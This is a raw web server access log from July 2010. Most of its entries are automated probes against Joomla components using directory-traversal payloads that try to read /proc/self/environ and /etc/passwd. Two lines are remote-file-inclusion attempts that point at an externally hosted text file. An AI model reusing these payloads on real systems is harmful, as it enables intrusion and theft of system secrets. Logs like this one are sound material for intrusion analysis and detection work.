222.124.193.12 - - [26/Jul/2010:23:00:54 +0200] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:23:01:00 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:01:35 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:01:35 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:23:03:20 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:03:33 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:03:34 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:03:36 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
80.89.233.48 - - [26/Jul/2010:23:04:33 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:23:04:33 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:23:04:33 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
91.121.7.123 - - [26/Jul/2010:23:06:12 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:06:12 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:06:12 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
66.7.193.3 - - [26/Jul/2010:23:10:09 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
66.7.193.3 - - [26/Jul/2010:23:10:49 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
91.121.7.123 - - [26/Jul/2010:23:15:18 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:15:18 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:23:15:18 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
62.149.171.147 - - [26/Jul/2010:23:17:03 +0200] "GET /logs/access_log//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:17:04 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:17:05 +0200] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:17:25 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:17:27 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:17:28 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
109.86.145.204 - - [26/Jul/2010:23:22:11 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:22:15 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:22:16 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:23:23:35 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:23:37 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:23:41 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:25:41 +0200] "GET /logs/access_log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:25:42 +0200] "GET //index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:25:43 +0200] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:28:47 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:28:48 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:28:50 +0200] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
109.86.145.204 - - [26/Jul/2010:23:31:01 +0200] "GET /logs/access_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:01 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:01 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:03 +0200] "GET /logs/access_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:03 +0200] "GET /logs/access_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:03 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:03 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:03 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
109.86.145.204 - - [26/Jul/2010:23:31:03 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:23:39:51 +0200] "GET /logs/access_log//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:39:53 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:23:39:54 +0200] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:23:43:41 +0200] "GET //index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.145.228.170 - - [26/Jul/2010:23:45:12 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
213.145.228.170 - - [26/Jul/2010:23:45:53 +0200] "GET /logs/access_log//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
213.145.228.170 - - [26/Jul/2010:23:45:53 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
213.145.228.170 - - [26/Jul/2010:23:45:53 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
119.192.145.144 - - [26/Jul/2010:23:46:35 +0200] "GET /logs/access_log//index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:23:46:35 +0200] "GET //index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:23:46:36 +0200] "GET /logs//index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.145.228.170 - - [26/Jul/2010:23:46:55 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
62.149.171.147 - - [26/Jul/2010:23:47:52 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:47:53 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:23:47:53 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.145.228.170 - - [26/Jul/2010:23:50:48 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
213.145.228.170 - - [26/Jul/2010:23:50:48 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
213.145.228.170 - - [26/Jul/2010:23:50:48 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
202.47.80.12 - - [26/Jul/2010:23:56:52 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [26/Jul/2010:23:56:58 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [26/Jul/2010:23:58:02 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [26/Jul/2010:23:58:04 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [26/Jul/2010:23:58:07 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [26/Jul/2010:23:58:09 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:00:56 +0200] "GET /logs/access_log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:00:57 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:00:59 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:01:29 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:01:30 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:03:06 +0200] "GET /logs/access_log//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:03:12 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:03:17 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:03:19 +0200] "GET /logs/access_log//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:03:24 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:03:30 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:04:38 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.44.82.61 - - [27/Jul/2010:00:10:09 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:10:09 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:11:11 +0200] "GET /logs/*?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:11:12 +0200] "GET /*?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-" "libwww-perl/5.803"
119.192.145.144 - - [27/Jul/2010:00:14:35 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:14:36 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:14:37 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.44.82.61 - - [27/Jul/2010:00:16:15 +0200] "GET /logs/index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:16:16 +0200] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:16:40 +0200] "GET /logs/*.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:16:40 +0200] "GET /*.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:16:45 +0200] "GET /logs/*?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:16:45 +0200] "GET /*?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:16:57 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:16:58 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:18:58 +0200] "GET /logs/?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.803"
62.44.82.61 - - [27/Jul/2010:00:18:59 +0200] "GET /?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.803"
62.149.171.147 - - [27/Jul/2010:00:24:20 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [27/Jul/2010:00:24:20 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [27/Jul/2010:00:24:20 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
66.249.71.87 - - [27/Jul/2010:00:28:58 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.87 - - [27/Jul/2010:00:28:58 +0200] "GET /logs/access_log HTTP/1.1" 200 320918 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.47.80.12 - - [27/Jul/2010:00:29:18 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:29:23 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:29:24 +0200] "GET /logs/access_log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:29:29 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:29:30 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:29:35 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.145.228.170 - - [27/Jul/2010:00:37:20 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
119.192.145.144 - - [27/Jul/2010:00:37:40 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:37:43 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.145.228.170 - - [27/Jul/2010:00:38:02 +0200] "GET /logs/access_log//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:00:38:02 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:00:38:03 +0200] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:00:43:25 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
119.192.145.144 - - [27/Jul/2010:00:43:48 +0200] "GET /become_editor.php?theme_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
119.192.145.144 - - [27/Jul/2010:00:43:48 +0200] "GET /logs/become_editor.php?theme_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
222.124.193.12 - - [27/Jul/2010:00:44:49 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:44:50 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:44:51 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:46:01 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:46:02 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:00:46:05 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:48:25 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:48:25 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:48:26 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:49:01 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:49:02 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:00:49:02 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
85.25.124.167 - - [27/Jul/2010:00:49:32 +0200] "GET / HTTP/1.1" 200 560 "-" "Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)"
85.25.124.167 - - [27/Jul/2010:00:50:58 +0200] "GET /?C=N;O=D HTTP/1.1" 200 560 "-" "Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)"
85.25.124.167 - - [27/Jul/2010:00:50:59 +0200] "GET /?C=M;O=A HTTP/1.1" 200 560 "-" "Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)"
85.25.124.167 - - [27/Jul/2010:00:51:00 +0200] "GET /?C=S;O=A HTTP/1.1" 200 560 "-" "Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)"
85.25.124.167 - - [27/Jul/2010:00:51:01 +0200] "GET /?C=D;O=A HTTP/1.1" 200 560 "-" "Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)"
85.25.124.167 - - [27/Jul/2010:00:51:02 +0200] "GET /logs/ HTTP/1.1" 200 797 "-" "Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)"
202.47.80.12 - - [27/Jul/2010:00:51:40 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:00:51:42 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
